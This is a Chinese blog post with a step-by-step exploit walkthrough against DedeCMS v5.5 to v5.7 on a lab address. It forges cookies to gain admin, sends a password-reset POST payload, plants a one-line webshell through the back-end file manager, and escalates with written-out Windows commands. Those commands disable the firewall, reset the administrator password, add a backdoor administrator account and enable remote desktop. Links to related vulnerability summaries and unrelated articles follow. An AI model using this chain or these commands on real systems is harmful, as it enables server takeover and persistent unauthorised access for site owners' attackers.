日期:2019-08-08 10:20:28
更新:
作者:Bay0net
介绍:

0x01、组合拳拿 shell

漏洞版本:v5.5 - v5.7

前台任意用户密码重置

首先注册一个账户,账户名为 0000001,此处注册的账户,前面是多个 0,后面是 1 就行。

注册链接:
http://192.168.31.59/member/index_do.php?fmdo=user&dopost=regnew

注册完成后,登录,登录完以后访问个人主页:
http://192.168.31.59/member/index.php?uid=0000001

查看当前的 cookie:

DedeUserID 改成自己的账户名,0000001
DedeUserID__ckMd5 改成 last_vid__ckMd5 的值。

修改后:

修改完成以后,访问个人主页,发现自己已经变成了 admin。
个人主页:http://192.168.31.59/member/

此时,我们已经利用 admin 权限登录到了前台,但是不知道 admin 的密码,如果想修改 admin 的密码,必须知道原密码,所以我们需要利用漏洞来重置前台 admin 用户的密码。

前台用户密码重置

把 burp 打开,然后利用下面的 payload,拿到修改密码的链接。

利用 hackerbar 去发送 payloa。

# URL

http://192.168.31.59/member/resetpassword.php

# POST 的数据

dopost=safequestion&safequestion=0.0&safeanswer=&id=1

放过 POST 的数据包,burp 就会抓到修改密码的数据包。

在浏览器中访问,即可重置用户的密码。(忘了截图,网上找了个,注意 IP 地址要改成自己的。)

此时,我们拥有了前台 admin 账户的密码。

修改后台 admin 密码

dedecms 在修改密码时,如果前台的用户是 admin,那么前台修改 admin 的密码,后台 admin 的密码也会变。

访问下面的页面,修改 admin 的密码,前后台 admin 密码会一起修改。
http://192.168.31.59/member/edit_baseinfo.php

利用修改的密码登录后台:
http://192.168.31.59/dede

后台拿 shell

访问后台,利用刚才修改的密码登录。
后台地址:192.168.31.59/dede/

依次选择模块 -> 文件管理器 -> 新建文件

写入一句话,然后保存。

成功上传一句话,可以执行。

提权

菜刀连接一句话,使用虚拟终端执行以下命令。

# 使用命令关闭防火墙

netsh advfirewall set allprofiles state off

# 重置管理员密码

net user administrator qwe123...

# 也可以新建账户,提到管理员组。

# 不如直接重置管理员密码方便,密码复杂度有问题的话新建还会出错。

net user gp001 qwe123... /add

net localgroup administrators gp001 /add

# 如果没开 3389 的话,需要用命令开启 3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

利用刚才新建的账户/密码,或者重置的管理员密码,远程连接即可。

DEDECMS 漏洞汇总的更多相关文章

  1. 应用安全 - PHP - CMS - DeDeCMS - 漏洞 - 汇总

    SSV-97074 Date 类型 前台任意密码修改 影响范围 前置条件 CVE-2018-20129 Date 类型前台文件上传 影响范围 前置条件(1)前台登录(2)/member/article ...

  2. 织梦dedecms漏洞修复大全(5.7起)

    很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题. 好,我们来一个一个修复.修复方法都是下载目录下该文件,然后替换或添加部分代码,保存后上传覆盖(记 ...

  3. Apache Shiro 漏洞汇总

    Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...

  4. DeDeCMS 每次都被黑出翔了!!DEDECMS漏洞扫描

    在dedecms基础上用插件的形式制作了一分类信息平台.结果问题不断的接踵而至.每次上去扫描一下.各种漏洞.危急代码一堆一堆的.全然被黑出翔了. 之所以这种原因, 1)开源程序的开放性,让全部人都能够 ...

  5. DEDECMS 漏洞修复方案

    目录 DEDECMS支付模块注入漏洞 漏洞文件: /include/payment/alipay.php 漏洞描述: 对输入参数$_GET['out_trade_no']未进行严格过滤 修复方案: 对 ...

  6. 企业网站被黑 dedecms漏洞修复办法

    前段时间网站被黑了,从百度打开网站直接被劫持跳转到了彩票,du博网站上去,网站的首页index.html文件也被篡改成一些什么北京sai车,pk10,一些cai票的关键词内容,搞得网站根本无法正常浏览 ...

  7. DeDecms远程写入漏洞webshell (dedecms漏洞)

    解释下Apache解析文件的流程: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名.如果所有的扩展名Apache都不认识,那么变会 ...

  8. 常见Java库漏洞汇总

    1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件 ...

  9. Zabbix漏洞汇总

    一.zabbix: zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案.zabbix能监视各种网络参数,保证服务器系统的安全运营:并提供灵活的通知机制以让 ...

随机推荐

  1. Percona MongoDB 4 搭建副本集

    什么是副本集: 是一组维护相同数据集的mongod进程 提供冗余,自动故障转移和高可用性 提供读取可伸缩性 内部概念或多或少与MySQL的概念相似 PRIMARY概念与MySQL复制中的MASTER大 ...

  2. 数据库允许空值(null),往往是悲剧的开始(1分钟系列)

    数据库字段允许空值,会遇到一些问题,此处包含的一些知识点,和大家聊一聊. 数据准备: create table user ( id int, name varchar(20), index(id) ) ...

  3. 第六章 组件 56 组件-组件中的data

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8&quo ...

  4. SSM框架中使用日志框架

    在 pom,xml 配置 Log4j jar 添加一个 mybatis_log.xml 文件 完整配置信息 <?xml version="1.0" encoding=&quo ...

  5. 一秒钟解决mysql使用游标出现取值乱码问题

    drop procedure if exists pro_test; delimiter // create procedure pro_test() begin declare str varcha ...

  6. Python之列表与元组的区别详解

    相同点:都是序列类型 回答它们的区别之前,先来说说两者有什么相同之处.list 与 tuple 都是序列类型的容器对象,可以存放任何类型的数据.支持切片.迭代等操作 foos = [0, 1, 2, ...

  7. 【Layui】Layui模板引擎生成下拉框不显示

    首先让我震惊了一下,layui引擎模板居然是支持ajax操作的 博主的需求是需要在数据表格内放入下拉框而下拉框的数据是数据库内查出来的(详见上一篇博客),但是下拉框怎么也显示不出来 找了四个小时的问题 ...

  8. keras默认配置

    使用keras后,会在用户目录下生成.keras/keras.json文件,Windows下为:C:\Users\user\.keras\keras.json,Linux下为:~/.keras/ker ...

  9. yii框架学习(MVC)

    路由:两种方式,第一种是默认方式访问,假设配置了虚拟主机,那么localhost/web/index.php?r=admin/index    访问的是controllers目录下的admin控制器里 ...

  10. pdf缩略图上传组件

    之前仿造uploadify写了一个HTML5版的文件上传插件,没看过的朋友可以点此先看一下~得到了不少朋友的好评,我自己也用在了项目中,不论是用户头像上传,还是各种媒体文件的上传,以及各种个性的业务需 ...